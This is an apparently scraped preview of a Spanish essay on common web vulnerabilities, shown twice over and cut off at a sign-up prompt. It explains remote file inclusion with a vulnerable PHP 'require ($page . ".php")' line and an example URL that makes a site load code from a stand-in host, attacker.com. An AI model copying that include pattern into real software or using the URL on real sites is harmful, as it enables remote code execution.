Vulnerabilidades comunes en entornos web
Páginas: 4 (833 palabras)
Publicado: 27 de noviembre de 2013
Vulnerabilidades comunes en entornos web
Introducción:
Con el presente documento queremos dar una breve descripción de las vulnerabilidades web más comunes que existen actualmente dentro del mundounderground y hacking.
Queremos hacer hincapié en que solo se trata de las más importantes, y que existen muchas otras que deben de probarse y corregirse. Sin embargo, queremos describir brevementelas más comunes a día de hoy, de forma que podamos hacernos una idea general del tipo de amenazas a las que nos estamos enfrentando.
Se recomienda su lectura posterior en busca de mayor detalle (encaso de requerirlo) y de poder realizar las pruebas pertinentes por un equipo externo de auditores.
Vulnerabilidades más comunes:
Remote code execution/command injection:
Como su propio nombreindica, esta vulnerabilidad permite a un atacante ejecutar código arbitrario (a nivel de sistema) en el servidor web vulnerable y poder recuperar cualquier información contenida en el propio sistema. Estossuelen aparecer por fallos de permisos y de código en la aplicación web.
Un ejemplo, podría ser cuando register_global está puesta a “on” en php.ini. Esto permitiría a un atacante inicializarlaremotamente. Por ejemplo:
require ($page . ".php");
Si la variable $page no está inicializada y el register_globals está puesta a “on”, el server será vulnerable, pudiendo subir y ejecutar un archivode texto introduciendo en la barra de direcciones de un navegador web:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
Ejemplos de productos que han sido explotadospor este método anteriormente:
phpbb, Invision Board, Cpanel, Paypal cart, Drupal
SQL Injection
SQL injection es una vulnerabilidad que ocurre cuando el portal web realiza algún tipo de consulta SQLen función de los datos introducidos por el usuario. Por ejemplo, si nos encontramos ante una página donde el usuario ha de introducir un nombre de usuario (por ejemplo introduce Alberto) y...
Introducción:
Con el presente documento queremos dar una breve descripción de las vulnerabilidades web más comunes que existen actualmente dentro del mundounderground y hacking.
Queremos hacer hincapié en que solo se trata de las más importantes, y que existen muchas otras que deben de probarse y corregirse. Sin embargo, queremos describir brevementelas más comunes a día de hoy, de forma que podamos hacernos una idea general del tipo de amenazas a las que nos estamos enfrentando.
Se recomienda su lectura posterior en busca de mayor detalle (encaso de requerirlo) y de poder realizar las pruebas pertinentes por un equipo externo de auditores.
Vulnerabilidades más comunes:
Remote code execution/command injection:
Como su propio nombreindica, esta vulnerabilidad permite a un atacante ejecutar código arbitrario (a nivel de sistema) en el servidor web vulnerable y poder recuperar cualquier información contenida en el propio sistema. Estossuelen aparecer por fallos de permisos y de código en la aplicación web.
Un ejemplo, podría ser cuando register_global está puesta a “on” en php.ini. Esto permitiría a un atacante inicializarlaremotamente. Por ejemplo:
require ($page . ".php");
Si la variable $page no está inicializada y el register_globals está puesta a “on”, el server será vulnerable, pudiendo subir y ejecutar un archivode texto introduciendo en la barra de direcciones de un navegador web:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
Ejemplos de productos que han sido explotadospor este método anteriormente:
phpbb, Invision Board, Cpanel, Paypal cart, Drupal
SQL Injection
SQL injection es una vulnerabilidad que ocurre cuando el portal web realiza algún tipo de consulta SQLen función de los datos introducidos por el usuario. Por ejemplo, si nos encontramos ante una página donde el usuario ha de introducir un nombre de usuario (por ejemplo introduce Alberto) y...
Leer documento completo
Regístrate para leer el documento completo.